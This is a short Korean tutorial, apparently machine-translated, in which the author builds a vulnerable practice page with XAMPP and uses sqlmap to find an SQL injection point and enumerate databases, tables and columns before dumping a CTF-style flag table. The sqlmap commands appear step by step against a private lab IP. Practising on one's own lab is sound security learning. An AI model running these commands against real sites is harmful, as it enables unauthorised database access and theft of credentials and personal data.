sqlmap 자동 스캐닝 주입점약기-sqlmap으로 사이트 sql 주입 빈틈을 감지하여 데이터 얻기
1915 단어 sqlmap 자동 스캐닝 주입점
이것은 터미널에 사용자 인터페이스를 제공하여 SQL이 빈틈을 주입하는 과정을 자동으로 감지하고 이용하는 침투 테스트 도구이다.[2]
명령줄에서 실행되는 이 소프트웨어는 Linux 릴리스, Windows 및 Mac OS 운영 체제와 같은 다양한 운영 체제를 다운로드할 수 있습니다.[3]
이 소프트웨어는 빈틈을 비추고 검사하는 것 외에 데이터베이스에 접근하여 데이터를 편집하고 삭제하며, 사용자, 비밀번호, 백업, 전화번호, 이메일 주소, 신용카드 및 기타 기밀과 민감한 정보를 볼 수 있다.
모든 주입 기술: 볼, 오류, 창고, 시간, 연합을 전면적으로 지원합니다.
준비:
1. 배경 설명: 현재 사이트 구조가 갈수록 많아지고 sql 주입 빈틈이 있는 사이트 연습자를 찾으려면 한다.나 같은 소백은 여전히 경험이 부족하다.차라리 스스로 하나 세우는 것이 빠르지, 어차피 연습이니까.
2. xampp 통합 도구를 이용하여 연습 환경을 구축한다. 간단하게 두 장의 페이지만 쓰고 한 장은 데이터를 제출하는 데 사용하며 한 장은 백엔드에서 데이터를 처리하고 데이터베이스를 조회하여 결과를 얻는다.
3. 관련 코드 파일이github에 업로드되었습니다.https://github.com/yulele17/testsql
작업 단계:
1. 주입점이 있는지 검사하고 주입점의 위치를 확정한다.
sqlmap-u'http://192.168.18.107/testsql/sqll.php?id=1'
매개 변수 id에 주입점 발견
2. 어떤 데이터베이스가 있는지 확인한다.
sqlmap-u'http://192.168.18.107/testsql/sqll.php?id=1'--dbs
모든 데이터베이스가 9개로 발견됐다.
3. 현재 데이터베이스 보기
sqlmap-u'http://192.168.18.107/testsql/sqll.php?id=1'--current-db
현재 데이터베이스 이름이:testsql입니다.
4. 현재 데이터베이스 아래에 어떤 표가 있는지 보기
sqlmap-u'http://192.168.18.107/testsql/sqll.php?id=1'-D testsql --tables
이 데이터베이스 아래에 두 개의 표만 있는 것을 발견했는데, 그 중에서user는 자연히 사용자를 저장한 것이다.만약 경기에 참가한다면 보통 플래그라는 표를 보는 것을 선택한다(뚜렷한 힌트잖아).
5. flag 테이블의 열을 봅니다.
sqlmap-u'http://192.168.18.107/testsql/sqll.php?id=1'-D testsql -T flag --columns
이 테이블은 flag만 있고 varchar(100) 형식인 것을 발견했습니다.
6. 이 테이블의 내용을 보려면 다음과 같이 하십시오.
sqlmap-u'http://192.168.18.107/testsql/sqll.php?id=1'-D testsql -T flag -C flag --dump
열이 하나밖에 없기 때문에 - C 뒤에는 매개 변수만 있고 여러 열이면 쉼표로 구분합니다.매개 변수 --dump는 DBMS 데이터베이스 항목을 덤프합니다.
이 표의 내용을 얻다.
흰둥이 하나, 틀린 점은 지적해 주시고, 정신을 가벼이 차리세요.